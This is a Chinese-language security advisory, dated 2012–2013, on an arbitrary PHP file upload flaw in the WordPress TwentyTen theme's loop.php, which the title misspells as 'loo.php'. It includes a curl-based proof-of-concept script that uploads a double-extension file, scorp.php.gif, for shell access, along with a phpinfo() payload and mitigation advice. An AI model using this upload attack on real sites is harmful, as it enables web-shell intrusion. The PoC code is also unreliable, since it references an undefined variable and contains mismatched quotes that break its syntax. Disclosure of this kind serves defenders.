WordPress TwentyTen Theme 'loo.php'任意文件上传漏洞

WordPress TwentyTen Theme 'loo.php'任意文件上传漏洞

发布日期：2012-12-28
更新日期：2013-01-04

受影响系统：
WordPress TwentyTen Theme 1.5.x
 WordPress TwentyTen Theme 1.4.x
 WordPress TwentyTen Theme 1.3.x
 WordPress TwentyTen Theme 1.2.x
 WordPress TwentyTen Theme 1.1.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57073
 
WordPress TwentyTen主题是现代的、可自定义的、简单的、可读的主题。
 
WordPress的TwentyTen主题存在任意PHP代码执行漏洞，/wordpress/wp-content/themes/twentyten/loop.php脚本没有正确验证或过滤用户上传的文件，通过提交带有多个文件扩展名的.php文件，可绕过安全检查，上传成功后，远程系统会将该文件放置在用户可访问的路径中。直接请求该上传的文件可允许用户以Web服务器的权限执行脚本。
 
<*来源：Agd_Scorp （vorscorp@hotmail.com）
 
  链接：http://packetstormsecurity.com/files/119145/WordPress-TwentyTen-Shell-Upload.html
        http://osvdb.org/88822
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<?php
 
$uploadfile="scorp.php.gif";
 
$ch =
 curl_init("http://www.example.com/wordpress/wp-content/themes/twentyten/loop.php");
 
curl_setopt($ch, CURLOPT_POST, true);
 curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$attachfile"));
 curl_setopt($ch, CURLOPT_POSTFIELDS, array('opt[]'=>"@$connector?rate=50&get_file=0?upload="@$attachfile"));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 $postResult = curl_exec($ch);
 curl_close($ch);
 
print "$postResult";
 
?>
 
Shell Access : http://www.example.com/wordpress/wp-content/themes/twentyten/scorp.php.gif
 Filename : $postResult output
 
scorp.php.gif
 <?php
 phpinfo();
 ?>

建议：
--------------------------------------------------------------------------------
临时解决方法：
 
如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：
 
*禁用WordPress TwentyTen主题
 
厂商补丁：
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://wordpress.org/extend/themes/twentyten